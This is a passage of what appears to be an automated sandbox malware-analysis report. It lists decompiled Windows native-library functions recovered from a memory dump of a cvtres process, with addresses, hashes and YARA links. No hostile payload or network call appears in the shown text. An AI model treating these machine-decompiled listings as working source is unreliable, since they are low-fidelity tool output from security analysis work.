				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x569d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E055C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                        0x0563fe96
                                                                        0x0563fe9e
                                                                        0x0563fea1
                                                                        0x0563fead
                                                                        0x0563feb3
                                                                        0x0563feb9
                                                                        0x0563fec3
                                                                        0x0563fed5
                                                                        0x0563fec5
                                                                        0x0563fece
                                                                        0x0563fece
                                                                        0x0563fee0
                                                                        0x0563fee1
                                                                        0x0563fee3
                                                                        0x0563fee8
                                                                        0x0563fefb

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6d41f094b95620f31773f15d1880b65e260c6f650a54a56da782598a34be16b
                                                                        • Instruction ID: 579a2ed972bf756ed1a96b5c33ecdee0693787fd19d121324058d7b61c9192e2
                                                                        • Opcode Fuzzy Hash: b6d41f094b95620f31773f15d1880b65e260c6f650a54a56da782598a34be16b
                                                                        • Instruction Fuzzy Hash: 2B016270A0020DAFCB14DFA8D546A6EBBF4FF48300F1041A9B515DB382DA35D901CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678F6A Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E05678F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x569d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E055C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                        0x05678f6a
                                                                        0x05678f79
                                                                        0x05678f81
                                                                        0x05678f84
                                                                        0x05678f8b
                                                                        0x05678f91
                                                                        0x05678f94
                                                                        0x05678f9e
                                                                        0x05678fb0
                                                                        0x05678fa0
                                                                        0x05678fa9
                                                                        0x05678fa9
                                                                        0x05678fbb
                                                                        0x05678fbc
                                                                        0x05678fbe
                                                                        0x05678fc3
                                                                        0x05678fd6

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9e5d55b406e59f7b070c71b10d68b767a5de61786a4533eac348cce1fd93dd7
                                                                        • Instruction ID: 350dd116956ed8d138a73f013223ebf66edbd8b3bebd9bd27d5f976afacc3c2e
                                                                        • Opcode Fuzzy Hash: e9e5d55b406e59f7b070c71b10d68b767a5de61786a4533eac348cce1fd93dd7
                                                                        • Instruction Fuzzy Hash: FB01E174A0520DAFDB04DFB8D549AAEBBB4FF48300F504459B955EB381DA74DE00CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0566131B Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E0566131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x569d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E055C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                        0x0566131b
                                                                        0x0566132a
                                                                        0x05661330
                                                                        0x05661336
                                                                        0x0566133e
                                                                        0x05661341
                                                                        0x05661344
                                                                        0x0566134f
                                                                        0x05661361
                                                                        0x05661351
                                                                        0x0566135a
                                                                        0x0566135a
                                                                        0x0566136c
                                                                        0x0566136d
                                                                        0x0566136f
                                                                        0x05661374
                                                                        0x05661387

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cce3e5441c88279ede0460a4aa25dc327a63a5ab8198cd889af9b3859560b48d
                                                                        • Instruction ID: 723833c0d1e496fa225309cdc36fe27c600130c774d2ecd16c84ec68c948b738
                                                                        • Opcode Fuzzy Hash: cce3e5441c88279ede0460a4aa25dc327a63a5ab8198cd889af9b3859560b48d
                                                                        • Instruction Fuzzy Hash: 0A013171E0124DAFCB04DFA9D545AAEB7F4FF49700F404059F846EB741E6349A00CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05661608 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 46%
                                                                        			E05661608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x569d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E055C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                        0x05661608
                                                                        0x05661617
                                                                        0x0566161d
                                                                        0x05661625
                                                                        0x05661628
                                                                        0x0566162b
                                                                        0x05661636
                                                                        0x05661648
                                                                        0x05661638
                                                                        0x05661641
                                                                        0x05661641
                                                                        0x05661653
                                                                        0x05661654
                                                                        0x05661656
                                                                        0x0566165b
                                                                        0x0566166e

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4717a551011d3ef3b439862b5e9067d00b2e6badaa63a38180d92afaba5737f8
                                                                        • Instruction ID: 52fc40bc5c91e1484667e10eac151b7a2d2ff3c70b6a59cdd6b44d52f6e5dcd2
                                                                        • Opcode Fuzzy Hash: 4717a551011d3ef3b439862b5e9067d00b2e6badaa63a38180d92afaba5737f8
                                                                        • Instruction Fuzzy Hash: 63F06271A14249EFCB04DFA8D506A6EBBF4FF49300F444069F905EB391EA349900CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CC577 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E055CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x55811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E056788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                        0x055cc577
                                                                        0x055cc57d
                                                                        0x055cc581
                                                                        0x055cc5b5
                                                                        0x055cc5b9
                                                                        0x055cc5ce
                                                                        0x055cc5ce
                                                                        0x055cc5ca
                                                                        0x00000000
                                                                        0x055cc5ca
                                                                        0x055cc5c4
                                                                        0x055cc5c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cc5ad
                                                                        0x00000000
                                                                        0x055cc5af

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9df02ba97d68e8286928e06fced7765cacc696f71af46f86898a951f4b1c3c28
                                                                        • Instruction ID: adcf90bf3da1f20270934d3ca148e69ef1edb543da22baba17dcb02cce4ec8a8
                                                                        • Opcode Fuzzy Hash: 9df02ba97d68e8286928e06fced7765cacc696f71af46f86898a951f4b1c3c28
                                                                        • Instruction Fuzzy Hash: 23F090B2A166949ED731D794801CF217FE5BB0A770F5448EED42E87105C6E4DC80C654
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678D34 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 43%
                                                                        			E05678D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x569d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E055C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                        0x05678d34
                                                                        0x05678d43
                                                                        0x05678d4b
                                                                        0x05678d4e
                                                                        0x05678d52
                                                                        0x05678d5c
                                                                        0x05678d6e
                                                                        0x05678d5e
                                                                        0x05678d67
                                                                        0x05678d67
                                                                        0x05678d79
                                                                        0x05678d7a
                                                                        0x05678d7c
                                                                        0x05678d81
                                                                        0x05678d94

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7023ca700c0ee12f335d0d457e07cf2faf7b028ac37d58eec66c978c49dc487a
                                                                        • Instruction ID: c7bc435b4367d6c5a26be2bd6ff67c6136893eaabfd7dba8b571f299a1bd6928
                                                                        • Opcode Fuzzy Hash: 7023ca700c0ee12f335d0d457e07cf2faf7b028ac37d58eec66c978c49dc487a
                                                                        • Instruction Fuzzy Hash: 53F03070A1460DAFDB14EFA8D54AA6E77B4FF58700F508099E906AB291EA34D900CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05662073 Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E05662073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0565FD22(__ecx);
				_t19 =  *0x569849c - _t3; // 0x54782a06
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5698748; // 0x0
					if(__eflags <= 0) {
						E05661C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5698724 & 0x00000004;
							if(( *0x5698724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5698724; // 0x0
					return E05658DF1(__ebx, 0xc0000374, 0x5695890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                        0x05662076
                                                                        0x05662078
                                                                        0x0566207d
                                                                        0x05662083
                                                                        0x056620a4
                                                                        0x056620aa
                                                                        0x056620ac
                                                                        0x056620b7
                                                                        0x056620ba
                                                                        0x056620bc
                                                                        0x056620c9
                                                                        0x056620c9
                                                                        0x056620d0
                                                                        0x056620d2
                                                                        0x00000000
                                                                        0x056620d2
                                                                        0x056620be
                                                                        0x056620c3
                                                                        0x056620c5
                                                                        0x056620c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056620c7
                                                                        0x056620bc
                                                                        0x056620d4
                                                                        0x05662085
                                                                        0x05662085
                                                                        0x056620a3
                                                                        0x056620a3

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 239cf9a9e4bf2f78441e81c7d5fbe92095255a965b385be3a2293672467461d0
                                                                        • Instruction ID: 4c174e28df1900acb506840a0e0917c8c5c687013a8857c3af8bddc967c18bc5
                                                                        • Opcode Fuzzy Hash: 239cf9a9e4bf2f78441e81c7d5fbe92095255a965b385be3a2293672467461d0
                                                                        • Instruction Fuzzy Hash: A9F05C7E5351C84BCF326F3431267E53FD9EB4A110F091445E8522B704CC398883CB24
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E927A Relevance: .0, Instructions: 32COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 54%
                                                                        			E055E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E055EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E055E92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                        0x055e9295
                                                                        0x055e9299
                                                                        0x055e929f
                                                                        0x055e92aa
                                                                        0x055e92ad
                                                                        0x055e92ae
                                                                        0x055e92af
                                                                        0x055e92b0
                                                                        0x055e92b4
                                                                        0x055e92bb
                                                                        0x055e92bb
                                                                        0x055e92c5

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                        • Instruction ID: 92be1b46ad12a28c6a07491076e22729f583742c0e17fbfd154d978c8b4ffc64
                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                        • Instruction Fuzzy Hash: 77E06D723406416BEB259F9ADC88F5776A9BFC2721F054079B9045E282CAE6D90987A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C746D Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E055C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E055BEB70(__ecx, 0x56979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E055E95D0();
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                        0x055c746d
                                                                        0x055c746d
                                                                        0x055c746d
                                                                        0x055c7471
                                                                        0x055c7488
                                                                        0x0560f92d
                                                                        0x055c748e
                                                                        0x055c7491
                                                                        0x055c7495
                                                                        0x0560f937
                                                                        0x0560f93a
                                                                        0x0560f94e
                                                                        0x0560f953
                                                                        0x0560f956
                                                                        0x0560f956
                                                                        0x055c7495
                                                                        0x00000000
                                                                        0x055c7488
                                                                        0x055c7473
                                                                        0x055c7478
                                                                        0x055c747d
                                                                        0x055c7481
                                                                        0x00000000
                                                                        0x055c7481
                                                                        0x055c747d
                                                                        0x055c747a
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 13a6479a7451f0f6a88771dbd73024c1db5161f3febd38e95a1f8a8dafd0f4bf
                                                                        • Instruction ID: f072ff928af15c2108e7db6d097211672b5a9fb0ff4c0d4d7f5fa647e5376ca7
                                                                        • Opcode Fuzzy Hash: 13a6479a7451f0f6a88771dbd73024c1db5161f3febd38e95a1f8a8dafd0f4bf
                                                                        • Instruction Fuzzy Hash: 31F03034A24145AEDF15D7E8C480F7ABFB3FF48350F0405DDD456A7950E7659801CE85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678CD6 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E05678CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x569d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E055C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                        0x05678ce5
                                                                        0x05678ced
                                                                        0x05678cf0
                                                                        0x05678cfb
                                                                        0x05678d0d
                                                                        0x05678cfd
                                                                        0x05678d06
                                                                        0x05678d06
                                                                        0x05678d18
                                                                        0x05678d19
                                                                        0x05678d1b
                                                                        0x05678d20
                                                                        0x05678d33

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5eae42292129d22ecde34c482b83ac12c3fab1e5e815fc75fd3660618cb82952
                                                                        • Instruction ID: 1157a1e809efcea591364c9307542f330ea8c3e89985bec2fdce45a04deaffe8
                                                                        • Opcode Fuzzy Hash: 5eae42292129d22ecde34c482b83ac12c3fab1e5e815fc75fd3660618cb82952
                                                                        • Instruction Fuzzy Hash: B6F08270A1420DAFCB04DBA8D94AE6E77B8FF49300F500199F916EB380EA34DD00C754
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A4F2E Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E056788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E055CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5581030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                        0x055a4f2e
                                                                        0x055a4f34
                                                                        0x055a4f38
                                                                        0x05600b85
                                                                        0x05600b85
                                                                        0x05600b89
                                                                        0x05600b9a
                                                                        0x05600b9a
                                                                        0x05600b9f
                                                                        0x00000000
                                                                        0x05600b9f
                                                                        0x05600b94
                                                                        0x05600b98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05600b98
                                                                        0x055a4f3e
                                                                        0x055a4f48
                                                                        0x00000000
                                                                        0x055a4f6e
                                                                        0x00000000
                                                                        0x055a4f70

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f939053e7332da8b5a2757b630f7492f4b6c88466b6bd5a7a25ee0618f3c5fa8
                                                                        • Instruction ID: 143e31a6b73796d082a9b30791b3401acd0a41d02a7066921e254c0b69d41730
                                                                        • Opcode Fuzzy Hash: f939053e7332da8b5a2757b630f7492f4b6c88466b6bd5a7a25ee0618f3c5fa8
                                                                        • Instruction Fuzzy Hash: 68F09A32525A858FD774E758C148F23B7E5BB00778F846464D40687AA0C7A5EC40C780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05678B58 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E05678B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x569d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E055C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E055EB640(E055E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                        0x05678b67
                                                                        0x05678b6f
                                                                        0x05678b72
                                                                        0x05678b7d
                                                                        0x05678b8f
                                                                        0x05678b7f
                                                                        0x05678b88
                                                                        0x05678b88
                                                                        0x05678b9a
                                                                        0x05678b9b
                                                                        0x05678b9d
                                                                        0x05678ba2
                                                                        0x05678bb5

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98ba5c897d9f0bbf7de1b44d5cfb52541da7aa81ad0cc4fec72190630226ef08
                                                                        • Instruction ID: 1f8af8360df33af68f97afc93a670636072d6afb78253ec029aaf7399de3d8c6
                                                                        • Opcode Fuzzy Hash: 98ba5c897d9f0bbf7de1b44d5cfb52541da7aa81ad0cc4fec72190630226ef08
                                                                        • Instruction Fuzzy Hash: 3CF082B0B1425DAFDB04EBA8D90AE6E77B8FF44700F440499B906DB380EA34DD01C794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DA44B Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5697b9c; // 0x0
				_t15 = __ecx;
				_t16 = L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E055EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                        0x055da44b
                                                                        0x055da453
                                                                        0x055da472
                                                                        0x055da476
                                                                        0x00000000
                                                                        0x055da493
                                                                        0x055da47a
                                                                        0x055da47f
                                                                        0x055da486
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5d514630a424e7d406e0ff5de0321e1369bd6dd8a92c989b8295161f6396c6d
                                                                        • Instruction ID: 0cddf3b15501a4d56b2598e86d1ac74380a5306e237c91e1d0519bdd1498eeb2
                                                                        • Opcode Fuzzy Hash: f5d514630a424e7d406e0ff5de0321e1369bd6dd8a92c989b8295161f6396c6d
                                                                        • Instruction Fuzzy Hash: E8E06D72A11421ABD2219E58EC01F67B6ADEBE5651F0A4439A505C7214DA28DD0187E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AF358 Relevance: .0, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E055AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E055DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L055C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                        0x055af35d
                                                                        0x055af361
                                                                        0x055af367
                                                                        0x055af372
                                                                        0x055af38c
                                                                        0x055af38c
                                                                        0x055af394

                                                                        Memory Dump Source
